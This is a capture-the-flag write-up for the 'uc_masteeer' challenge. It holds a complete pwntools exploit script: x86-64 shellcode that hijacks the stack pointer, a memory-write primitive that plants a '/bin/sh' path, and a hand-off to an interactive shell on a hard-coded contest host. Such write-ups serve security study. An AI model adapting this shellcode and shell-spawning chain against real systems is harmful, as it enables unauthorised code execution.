

## uc_masteeer

Hijack the stack directly: the first-stage shellcode repoints `rsp` into the region around `0xbabecafe000` and jumps to a fixed address, after which the write primitive (menu option 3) drops a NUL-terminated `/bin/sh` path just above the new stack and menu option 2 is sent to kick off the final stage. The host/port in the script are the original contest target and every address is a challenge constant, so the script is not portable as-is.

```python
#!/usr/bin/python3
# -*- coding:utf-8 -*-

from pwn import *
import os, struct, random, time, sys, signal

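context.arch = 'amd64'
# Target selection via pwntools' `args` (parsed from argv, e.g.
# `python3 exploit.py LOCAL DEBUG`):
#   LOCAL  -> spawn the challenge script locally (assumes it is executable,
#             i.e. the shebang/exec bit are in place)
#   DEBUG  -> dump every send/recv to stdout
# With no arguments the script talks to the original contest host below,
# which is unlikely to still be up.
if args.DEBUG:
    context.log_level = 'debug'
execve_file = './uc_masteeer.py'
if args.LOCAL:
    sh = process(execve_file)
else:
    sh = remote('111.186.59.29', 10087)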

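def patch(addr, size, data):
    """Drive menu option 3 of the target: write `data` at guest address `addr`.

    The exchange is prompt-driven -- each value goes out only after its
    prompt ('?: ', 'addr: ', 'size: ', 'data: ') has been received.  `addr`
    and `size` are sent as little-endian 64-bit integers, `data` is sent raw.

    Raises ValueError if len(data) != size.  The target presumably reads
    exactly `size` bytes (confirm against the challenge's read loop): a
    shorter buffer would stall the exchange waiting for more input, and a
    longer one would have its tail consumed as the next menu command, so a
    mismatch is always a bug in the caller.
    """
    if len(data) != size:
        raise ValueError(f'patch: data is {len(data)} bytes but size is {size}')
    sh.sendlineafter(b'?: ', b'3')
    sh.sendafter(b'addr: ', p64(addr))
    sh.sendafter(b'size: ', p64(size))
    sh.sendafter(b'data: ', data)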

# Stage 1: raw machine code, sent immediately (no prompt is awaited first).
# It stores 0xDEADBEF1030 at 0xbabecafe000, loads rax with 0xbabecafe800,
# moves rsp to 0xbabecafe233 - 0x18 (= 0xbabecafe21b) and ends with an
# unconditional jump to 0xdeadbeef066.  All of these are challenge constants
# -- presumably fixed mappings/hooks of the emulated target (TODO: confirm
# against the challenge source; nothing here derives them at runtime).
shellcode = asm('''

mov rdx, 0xDEADBEF1030
mov rbx, 0xbabecafe000
mov [rbx], rdx
mov rax, 0xbabecafe800

mov rcx, 0xbabecafe233
lea rsp, [rcx-0x18]

mov rcx, 0xdeadbeef066
jmp rcx
''')
sh.send(shellcode)

# Stage 2: the write primitive (menu option 3) places a 15-byte,
# NUL-terminated path at 0xbabecafe23b, i.e. 0x20 bytes above the rsp set
# by stage 1.  The 'k33nlab' prefix is presumably something the target
# requires on the path (e.g. a prefix check) -- verify before reusing.
# Menu option 2 is then sent; it presumably triggers execution of what was
# set up above.
patch(0xbabecafe233 + 8, 15, b'k33nlab/bin/sh\0')
sh.sendlineafter('?: ', '2')

# Hand the connection over to the operator; if the chain worked this is a shell.
sh.interactive()

```

Author: www.xmcve.com